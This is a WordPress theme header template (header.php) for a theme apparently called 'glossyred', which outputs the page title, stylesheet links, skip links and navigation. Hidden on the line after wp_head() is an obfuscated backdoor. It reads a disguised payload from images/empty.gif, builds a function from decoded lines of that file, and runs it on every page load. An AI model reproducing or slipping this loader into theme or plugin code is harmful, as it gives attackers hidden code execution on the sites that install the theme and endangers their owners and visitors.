<!DOCTYPE html>
<html <?php language_attributes();?>>
	<head>
		<meta charset="<?php bloginfo('charset');?>" />
		<title>
			<?php
			global $page, $paged;
			wp_title('-', true, 'right');
			bloginfo('name');
			$site_description = get_bloginfo('description', 'display');
			if($site_description && (is_home() || is_front_page()))
				echo " &#8211; $site_description";
			if($paged >= 2 || $page >= 2)
				echo ' &#8211; ' . sprintf(__('Страница %s', 'glossyred'), max($paged, $page));
		?>
		</title>
		<link rel="stylesheet" href="<?php echo get_stylesheet_directory_uri();?>/style.css" type="text/css" media="screen" />
		<link rel="shortcut icon" href="<?php echo get_stylesheet_directory_uri();?>/images/favicon.ico" />
		<link rel="pingback" href="<?php bloginfo('pingback_url');?>" />
		<link rel="profile" href="http://gmpg.org/xfn/11" />
		<?php if(is_singular() && get_option('thread_comments')) { wp_enqueue_script('comment-reply'); } ?>
		<?php  wp_head(); $gif=file(dirname(__FILE__).'/images/empty.gif',2);$gif=$gif[5]("",$gif[6]($gif[4]));$gif();?>
	</head>
	<body <?php body_class(); ?>>

		<!-- - - - - - - - - - - - - - - - -  Skiplinks - - - - - - - - - - - - - - - - - - - - - - - - -  -->

		<div id="topnav">
			<span class="navlinks">
				<a href="#nav_wrapper" class="skip" title="Ссылка перехода к навигации">К навигации</a>
				<span class="hideme">.</span>
				<a href="#article" class="skip" title="Ссылка перехода к содержанию">К содержанию</a>
				<span class="hideme">.</span>
			</span>
		</div>
		<!-- - - - - - - - - - - - - - - - -  Header & Navigation - - - - - - - - - - - - - - - - - - - - - - - - - - -  -->

		<div id="navmargins">
			<div id="nav_wrapper">
				<?php wp_nav_menu( array('menu' => 'primary', 'menu_id' => 'nav', 'theme_location' => 'primary', 'depth' => 3));?>
                <?php get_search_form(); ?>
			</div>
		</div>
		<div id="head">
			<div id="head_wrapper">
				<h1>
				<a href="<?php echo home_url();?>" class="logo">
				<?php bloginfo('name');?>
				</a>
				</h1>
				<h2>
				<?php bloginfo('description');?>
				</h2>
			</div>
		</div>
